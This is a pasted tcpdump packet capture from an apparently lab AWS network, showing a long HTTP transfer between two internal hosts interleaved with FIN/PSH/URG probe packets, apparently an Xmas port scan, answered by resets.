· 4 years ago · Feb 16, 2021, 04:44 PM
1 (6), length 40)
2 ip-10-10-148-177.eu-west-1.f (incorrect -> 0x2ec6), seq 25919214, ack 10844, win 482, options [nop,nop,TS val 997087424 ecr 3431983964], length 0
300:43:01.264574 IP (tos 0x0, ttl 64, id 24642, offset 0, flags [DF], proto TCP (6), length 68)
4 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc068 (correct), seq 10844:10860, ack 25919214, win 6347, options [nop,nop,TS val 3431983988 ecr 997087424], length 16: HTTP
500:43:01.264692 IP (tos 0x0, ttl 64, id 24448, offset 0, flags [DF], proto TCP (6), length 52)
6 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x2e86), seq 25919214, ack 10860, win 482, options [nop,nop,TS val 997087448 ecr 3431983988], length 0
700:43:01.277428 IP (tos 0x0, ttl 64, id 24449, offset 0, flags [DF], proto TCP (6), length 62695)
8 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x0198), seq 25919214:25981857, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 62643: HTTP
900:43:01.277641 IP (tos 0x0, ttl 64, id 24456, offset 0, flags [DF], proto TCP (6), length 2896)
10 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xc437), seq 25981857:25984701, ack 10860, win 482, options [nop,nop,TS val 997087461 ecr 3431983988], length 2844: HTTP
1100:43:01.277861 IP (tos 0x0, ttl 64, id 24643, offset 0, flags [DF], proto TCP (6), length 52)
12 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2413 (correct), seq 10860, ack 25981857, win 6023, options [nop,nop,TS val 3431984001 ecr 997087461], length 0
1300:43:01.278729 IP (tos 0x0, ttl 64, id 24457, offset 0, flags [DF], proto TCP (6), length 49808)
14 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6d6c (incorrect -> 0xdba3), seq 25984701:26034457, ack 10860, win 482, options [nop,nop,TS val 997087462 ecr 3431984001], length 49756: HTTP
1500:43:01.279044 IP (tos 0x0, ttl 64, id 24644, offset 0, flags [DF], proto TCP (6), length 52)
16 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x8c8d (correct), seq 10860, ack 26020497, win 6171, options [nop,nop,TS val 3431984002 ecr 997087461], length 0
1700:43:01.279178 IP (tos 0x0, ttl 64, id 24645, offset 0, flags [DF], proto TCP (6), length 52)
18 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x5654 (correct), seq 10860, ack 26034457, win 6091, options [nop,nop,TS val 3431984002 ecr 997087462], length 0
1900:43:01.300692 IP (tos 0x0, ttl 64, id 24646, offset 0, flags [DF], proto TCP (6), length 68)
20 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x162d (correct), seq 10860:10876, ack 26034457, win 6347, options [nop,nop,TS val 3431984024 ecr 997087462], length 16: HTTP
2100:43:01.307395 IP (tos 0x0, ttl 43, id 20042, offset 0, flags [none], proto TCP (6), length 40)
22 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.50800: Flags [FPU], cksum 0x1124 (correct), seq 3180519713, win 1024, urg 0, length 0
2300:43:01.307809 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
24 ip-10-10-200-226.eu-west-1.compute.internal.50800 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0x1538 (correct), seq 0, ack 3180519714, win 0, length 0
2500:43:01.340331 IP (tos 0x0, ttl 64, id 24463, offset 0, flags [DF], proto TCP (6), length 62695)
26 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x8784), seq 26034457:26097100, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 62643: HTTP
2700:43:01.340512 IP (tos 0x0, ttl 64, id 24470, offset 0, flags [DF], proto TCP (6), length 2896)
28 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xe78e), seq 26097100:26099944, ack 10876, win 482, options [nop,nop,TS val 997087524 ecr 3431984024], length 2844: HTTP
2900:43:01.340700 IP (tos 0x0, ttl 64, id 24647, offset 0, flags [DF], proto TCP (6), length 52)
30 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6158 (correct), seq 10876, ack 26097100, win 6023, options [nop,nop,TS val 3431984064 ecr 997087524], length 0
3100:43:01.341746 IP (tos 0x0, ttl 64, id 24471, offset 0, flags [DF], proto TCP (6), length 57493)
32 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8b71 (incorrect -> 0xb438), seq 26099944:26157385, ack 10876, win 482, options [nop,nop,TS val 997087525 ecr 3431984064], length 57441: HTTP
3300:43:01.342068 IP (tos 0x0, ttl 64, id 24648, offset 0, flags [DF], proto TCP (6), length 52)
34 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x75b9 (correct), seq 10876, ack 26157385, win 6055, options [nop,nop,TS val 3431984065 ecr 997087524], length 0
3500:43:01.350522 IP (tos 0x0, ttl 64, id 24649, offset 0, flags [DF], proto TCP (6), length 68)
36 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xcc87 (correct), seq 10876:10892, ack 26157385, win 6347, options [nop,nop,TS val 3431984074 ecr 997087524], length 16: HTTP
3700:43:01.387559 IP (tos 0x0, ttl 52, id 44283, offset 0, flags [none], proto TCP (6), length 40)
38 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd368 (correct), seq 3180585248, win 1024, urg 0, length 0
3900:43:01.388017 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
40 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd77c (correct), seq 0, ack 3180585249, win 0, length 0
4100:43:01.391305 IP (tos 0x0, ttl 64, id 24478, offset 0, flags [DF], proto TCP (6), length 52)
42 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8b32), seq 26157385, ack 10892, win 482, options [nop,nop,TS val 997087575 ecr 3431984074], length 0
4300:43:01.416224 IP (tos 0x0, ttl 64, id 24650, offset 0, flags [DF], proto TCP (6), length 68)
44 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x157a (correct), seq 10892:10908, ack 26157385, win 6347, options [nop,nop,TS val 3431984139 ecr 997087575], length 16: HTTP
4500:43:01.416392 IP (tos 0x0, ttl 64, id 24479, offset 0, flags [DF], proto TCP (6), length 52)
46 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x8ac8), seq 26157385, ack 10908, win 482, options [nop,nop,TS val 997087600 ecr 3431984139], length 0
4700:43:01.447462 IP (tos 0x0, ttl 64, id 24480, offset 0, flags [DF], proto TCP (6), length 62695)
48 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x5330), seq 26157385:26220028, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 62643: HTTP
4900:43:01.447640 IP (tos 0x0, ttl 64, id 24487, offset 0, flags [DF], proto TCP (6), length 2896)
50 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0x0eb5), seq 26220028:26222872, ack 10908, win 482, options [nop,nop,TS val 997087631 ecr 3431984139], length 2844: HTTP
5100:43:01.447812 IP (tos 0x0, ttl 64, id 24651, offset 0, flags [DF], proto TCP (6), length 52)
52 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x0b41 (correct), seq 10908, ack 26184232, win 6219, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
5300:43:01.447832 IP (tos 0x0, ttl 64, id 24652, offset 0, flags [DF], proto TCP (6), length 52)
54 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x7524 (correct), seq 10908, ack 26222872, win 6007, options [nop,nop,TS val 3431984171 ecr 997087631], length 0
5500:43:01.448819 IP (tos 0x0, ttl 64, id 24488, offset 0, flags [DF], proto TCP (6), length 53862)
56 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7d42 (incorrect -> 0x3270), seq 26222872:26276682, ack 10908, win 482, options [nop,nop,TS val 997087632 ecr 3431984171], length 53810: HTTP
5700:43:01.449091 IP (tos 0x0, ttl 64, id 24653, offset 0, flags [DF], proto TCP (6), length 52)
58 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2e34 (correct), seq 10908, ack 26240770, win 6267, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
5900:43:01.449118 IP (tos 0x0, ttl 64, id 24654, offset 0, flags [DF], proto TCP (6), length 52)
60 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xa2b1 (correct), seq 10908, ack 26276682, win 6069, options [nop,nop,TS val 3431984172 ecr 997087632], length 0
6100:43:01.454009 IP (tos 0x0, ttl 64, id 24655, offset 0, flags [DF], proto TCP (6), length 68)
62 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x264c (correct), seq 10908:10924, ack 26276682, win 6347, options [nop,nop,TS val 3431984177 ecr 997087632], length 16: HTTP
6300:43:01.467754 IP (tos 0x0, ttl 41, id 34770, offset 0, flags [none], proto TCP (6), length 40)
64 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.2041: Flags [FPU], cksum 0xcf9c (correct), seq 3180585248, win 1024, urg 0, length 0
6500:43:01.468111 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
66 ip-10-10-200-226.eu-west-1.compute.internal.2041 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xd3b0 (correct), seq 0, ack 3180585249, win 0, length 0
6700:43:01.492453 IP (tos 0x0, ttl 64, id 24656, offset 0, flags [DF], proto TCP (6), length 68)
68 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x9b2a (correct), seq 10924:10940, ack 26276682, win 6347, options [nop,nop,TS val 3431984216 ecr 997087632], length 16: HTTP
6900:43:01.492496 IP (tos 0x0, ttl 64, id 24495, offset 0, flags [DF], proto TCP (6), length 52)
70 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xb833), seq 26276682, ack 10940, win 482, options [nop,nop,TS val 997087676 ecr 3431984177], length 0
7100:43:01.525524 IP (tos 0x0, ttl 64, id 24496, offset 0, flags [DF], proto TCP (6), length 62695)
72 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xec98), seq 26276682:26339325, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 62643: HTTP
7300:43:01.525721 IP (tos 0x0, ttl 64, id 24503, offset 0, flags [DF], proto TCP (6), length 2896)
74 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd146), seq 26339325:26342169, ack 10940, win 482, options [nop,nop,TS val 997087709 ecr 3431984177], length 2844: HTTP
7500:43:01.525900 IP (tos 0x0, ttl 64, id 24657, offset 0, flags [DF], proto TCP (6), length 52)
76 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xad71 (correct), seq 10940, ack 26339325, win 6023, options [nop,nop,TS val 3431984249 ecr 997087709], length 0
7700:43:01.526608 IP (tos 0x0, ttl 64, id 24504, offset 0, flags [DF], proto TCP (6), length 49093)
78 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x6aa1 (incorrect -> 0x1828), seq 26342169:26391210, ack 10940, win 482, options [nop,nop,TS val 997087710 ecr 3431984249], length 49041: HTTP
7900:43:01.526937 IP (tos 0x0, ttl 64, id 24658, offset 0, flags [DF], proto TCP (6), length 52)
80 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xf326 (correct), seq 10940, ack 26386914, win 6123, options [nop,nop,TS val 3431984250 ecr 997087709], length 0
8100:43:01.530054 IP (tos 0x0, ttl 64, id 24659, offset 0, flags [DF], proto TCP (6), length 68)
82 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0e84 (correct), seq 10940:10956, ack 26391210, win 6347, options [nop,nop,TS val 3431984253 ecr 997087710], length 16: HTTP
8300:43:01.547948 IP (tos 0x0, ttl 53, id 48049, offset 0, flags [none], proto TCP (6), length 40)
84 ip-10-10-148-177.eu-west-1.compute.internal.50122 > ip-10-10-200-226.eu-west-1.compute.internal.1069: Flags [FPU], cksum 0xd367 (correct), seq 3180519713, win 1024, urg 0, length 0
8500:43:01.548349 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
86 ip-10-10-200-226.eu-west-1.compute.internal.1069 > ip-10-10-148-177.eu-west-1.compute.internal.50122: Flags [R.], cksum 0xd77b (correct), seq 0, ack 3180519714, win 0, length 0
8700:43:01.571378 IP (tos 0x0, ttl 64, id 24510, offset 0, flags [DF], proto TCP (6), length 52)
88 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf826), seq 26391210, ack 10956, win 482, options [nop,nop,TS val 997087755 ecr 3431984253], length 0
8900:43:01.588390 IP (tos 0x0, ttl 64, id 24660, offset 0, flags [DF], proto TCP (6), length 68)
90 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x5a42 (correct), seq 10956:10972, ack 26391210, win 6347, options [nop,nop,TS val 3431984311 ecr 997087755], length 16: HTTP
9100:43:01.588572 IP (tos 0x0, ttl 64, id 24511, offset 0, flags [DF], proto TCP (6), length 52)
92 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0xf7cb), seq 26391210, ack 10972, win 482, options [nop,nop,TS val 997087772 ecr 3431984311], length 0
9300:43:01.620113 IP (tos 0x0, ttl 64, id 24512, offset 0, flags [DF], proto TCP (6), length 62695)
94 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x95ad), seq 26391210:26453853, ack 10972, win 482, options [nop,nop,TS val 997087803 ecr 3431984311], length 62643: HTTP
9500:43:01.620337 IP (tos 0x0, ttl 64, id 24519, offset 0, flags [DF], proto TCP (6), length 2896)
96 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xb171), seq 26453853:26456697, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984311], length 2844: HTTP
9700:43:01.620538 IP (tos 0x0, ttl 64, id 24661, offset 0, flags [DF], proto TCP (6), length 52)
98 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xed32 (correct), seq 10972, ack 26453853, win 6023, options [nop,nop,TS val 3431984344 ecr 997087803], length 0
9900:43:01.621180 IP (tos 0x0, ttl 64, id 24520, offset 0, flags [DF], proto TCP (6), length 51025)
100 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x722d (incorrect -> 0x1091), seq 26456697:26507670, ack 10972, win 482, options [nop,nop,TS val 997087804 ecr 3431984344], length 50973: HTTP
10100:43:01.621638 IP (tos 0x0, ttl 64, id 24662, offset 0, flags [DF], proto TCP (6), length 52)
102 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xbdfb (correct), seq 10972, ack 26465646, win 6315, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
10300:43:01.621654 IP (tos 0x0, ttl 64, id 24663, offset 0, flags [DF], proto TCP (6), length 52)
104 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x1ab3 (correct), seq 10972, ack 26507670, win 6091, options [nop,nop,TS val 3431984345 ecr 997087804], length 0
10500:43:01.624279 IP (tos 0x0, ttl 64, id 24664, offset 0, flags [DF], proto TCP (6), length 68)
106 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0234 (correct), seq 10972:10988, ack 26507670, win 6347, options [nop,nop,TS val 3431984347 ecr 997087804], length 16: HTTP
10700:43:01.628148 IP (tos 0x0, ttl 58, id 3834, offset 0, flags [none], proto TCP (6), length 40)
108 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.50002: Flags [FPU], cksum 0x1443 (correct), seq 3180585248, win 1024, urg 0, length 0
10900:43:01.628589 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
110 ip-10-10-200-226.eu-west-1.compute.internal.50002 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0x1857 (correct), seq 0, ack 3180585249, win 0, length 0
11100:43:01.667290 IP (tos 0x0, ttl 64, id 24526, offset 0, flags [DF], proto TCP (6), length 52)
112 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x305b), seq 26507670, ack 10988, win 482, options [nop,nop,TS val 997087851 ecr 3431984347], length 0
11300:43:01.673072 IP (tos 0x0, ttl 64, id 24665, offset 0, flags [DF], proto TCP (6), length 68)
114 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x80d0 (correct), seq 10988:11004, ack 26507670, win 6347, options [nop,nop,TS val 3431984396 ecr 997087851], length 16: HTTP
11500:43:01.673229 IP (tos 0x0, ttl 64, id 24527, offset 0, flags [DF], proto TCP (6), length 52)
116 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x3014), seq 26507670, ack 11004, win 482, options [nop,nop,TS val 997087857 ecr 3431984396], length 0
11700:43:01.693950 IP (tos 0x0, ttl 64, id 24528, offset 0, flags [DF], proto TCP (6), length 62695)
118 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0xa00a), seq 26507670:26570313, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 62643: HTTP
11900:43:01.694174 IP (tos 0x0, ttl 64, id 24535, offset 0, flags [DF], proto TCP (6), length 2896)
120 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xd4cf), seq 26570313:26573157, ack 11004, win 482, options [nop,nop,TS val 997087877 ecr 3431984396], length 2844: HTTP
12100:43:01.694314 IP (tos 0x0, ttl 64, id 24666, offset 0, flags [DF], proto TCP (6), length 52)
122 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd367 (correct), seq 11004, ack 26525568, win 6267, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
12300:43:01.694357 IP (tos 0x0, ttl 64, id 24667, offset 0, flags [DF], proto TCP (6), length 52)
124 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x2592 (correct), seq 11004, ack 26570313, win 6023, options [nop,nop,TS val 3431984417 ecr 997087877], length 0
12500:43:01.695237 IP (tos 0x0, ttl 64, id 24536, offset 0, flags [DF], proto TCP (6), length 56372)
126 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x8710 (incorrect -> 0xb84e), seq 26573157:26629477, ack 11004, win 482, options [nop,nop,TS val 997087879 ecr 3431984417], length 56320: HTTP
12700:43:01.695565 IP (tos 0x0, ttl 64, id 24668, offset 0, flags [DF], proto TCP (6), length 52)
128 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0xd395 (correct), seq 11004, ack 26591055, win 6267, options [nop,nop,TS val 3431984419 ecr 997087877], length 0
12900:43:01.695663 IP (tos 0x0, ttl 64, id 24669, offset 0, flags [DF], proto TCP (6), length 52)
130 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x3e51 (correct), seq 11004, ack 26629477, win 6055, options [nop,nop,TS val 3431984419 ecr 997087879], length 0
13100:43:01.704028 IP (tos 0x0, ttl 64, id 24670, offset 0, flags [DF], proto TCP (6), length 68)
132 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x8f6b (correct), seq 11004:11020, ack 26629477, win 6347, options [nop,nop,TS val 3431984427 ecr 997087879], length 16: HTTP
13300:43:01.708350 IP (tos 0x0, ttl 44, id 26586, offset 0, flags [none], proto TCP (6), length 40)
134 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.3221: Flags [FPU], cksum 0xcb00 (correct), seq 3180585248, win 1024, urg 0, length 0
13500:43:01.708843 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
136 ip-10-10-200-226.eu-west-1.compute.internal.3221 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xcf14 (correct), seq 0, ack 3180585249, win 0, length 0
13700:43:01.738530 IP (tos 0x0, ttl 64, id 24671, offset 0, flags [DF], proto TCP (6), length 70)
138 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0x0d86 (correct), seq 11020:11038, ack 26629477, win 6347, options [nop,nop,TS val 3431984462 ecr 997087879], length 18: HTTP
13900:43:01.738578 IP (tos 0x0, ttl 64, id 24543, offset 0, flags [DF], proto TCP (6), length 52)
140 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x53c1), seq 26629477, ack 11038, win 482, options [nop,nop,TS val 997087922 ecr 3431984427], length 0
14100:43:01.763935 IP (tos 0x0, ttl 64, id 24672, offset 0, flags [DF], proto TCP (6), length 68)
142 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xfe5e (correct), seq 11038:11054, ack 26629477, win 6347, options [nop,nop,TS val 3431984487 ecr 997087922], length 16: HTTP
14300:43:01.788549 IP (tos 0x0, ttl 50, id 61856, offset 0, flags [none], proto TCP (6), length 40)
144 ip-10-10-148-177.eu-west-1.compute.internal.50121 > ip-10-10-200-226.eu-west-1.compute.internal.5800: Flags [FPU], cksum 0xc0ed (correct), seq 3180585248, win 1024, urg 0, length 0
14500:43:01.789163 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
146 ip-10-10-200-226.eu-west-1.compute.internal.5800 > ip-10-10-148-177.eu-west-1.compute.internal.50121: Flags [R.], cksum 0xc501 (correct), seq 0, ack 3180585249, win 0, length 0
14700:43:01.798617 IP (tos 0x0, ttl 64, id 24673, offset 0, flags [DF], proto TCP (6), length 68)
148 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xc159 (correct), seq 11054:11070, ack 26629477, win 6347, options [nop,nop,TS val 3431984522 ecr 997087922], length 16: HTTP
14900:43:01.798659 IP (tos 0x0, ttl 64, id 24544, offset 0, flags [DF], proto TCP (6), length 52)
150 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x5329), seq 26629477, ack 11070, win 482, options [nop,nop,TS val 997087982 ecr 3431984487], length 0
15100:43:01.806357 IP (tos 0x0, ttl 64, id 24545, offset 0, flags [DF], proto TCP (6), length 62695)
152 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0x9fc3 (incorrect -> 0x4ffe), seq 26629477:26692120, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 62643: HTTP
15300:43:01.806595 IP (tos 0x0, ttl 64, id 24552, offset 0, flags [DF], proto TCP (6), length 2896)
154 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0xb62b (incorrect -> 0xfc4f), seq 26692120:26694964, ack 11070, win 482, options [nop,nop,TS val 997087990 ecr 3431984487], length 2844: HTTP
15500:43:01.806779 IP (tos 0x0, ttl 64, id 24674, offset 0, flags [DF], proto TCP (6), length 52)
156 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x48a1 (correct), seq 11070, ack 26692120, win 6019, options [nop,nop,TS val 3431984530 ecr 997087990], length 0
15700:43:01.808183 IP (tos 0x0, ttl 64, id 24553, offset 0, flags [DF], proto TCP (6), length 52618)
158 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [P.], cksum 0x7866 (incorrect -> 0x7032), seq 26694964:26747530, ack 11070, win 482, options [nop,nop,TS val 997087991 ecr 3431984530], length 52566: HTTP
15900:43:01.808500 IP (tos 0x0, ttl 64, id 24675, offset 0, flags [DF], proto TCP (6), length 52)
160 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [.], cksum 0x6fe4 (correct), seq 11070, ack 26747530, win 6091, options [nop,nop,TS val 3431984532 ecr 997087990], length 0
16100:43:01.838902 IP (tos 0x0, ttl 64, id 24676, offset 0, flags [DF], proto TCP (6), length 68)
162 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xecc5 (correct), seq 11070:11086, ack 26747530, win 6347, options [nop,nop,TS val 3431984562 ecr 997087990], length 16: HTTP
16300:43:01.854816 IP (tos 0x0, ttl 64, id 24677, offset 0, flags [DF], proto TCP (6), length 70)
164 ip-10-100-1-202.eu-west-1.compute.internal.49630 > ip-10-10-148-177.eu-west-1.compute.internal.http: Flags [P.], cksum 0xf14c (correct), seq 11086:11104, ack 26747530, win 6347, options [nop,nop,TS val 3431984578 ecr 997087990], length 18: HTTP
16500:43:01.854940 IP (tos 0x0, ttl 64, id 24559, offset 0, flags [DF], proto TCP (6), length 52)
166 ip-10-10-148-177.eu-west-1.compute.internal.http > ip-10-100-1-202.eu-west-1.compute.internal.49630: Flags [.], cksum 0xab0f (incorrect -> 0x855d), seq 26747530, ack 11104, win 482, options [nop,nop,TS val 997088038 ecr 3431984562], length 0
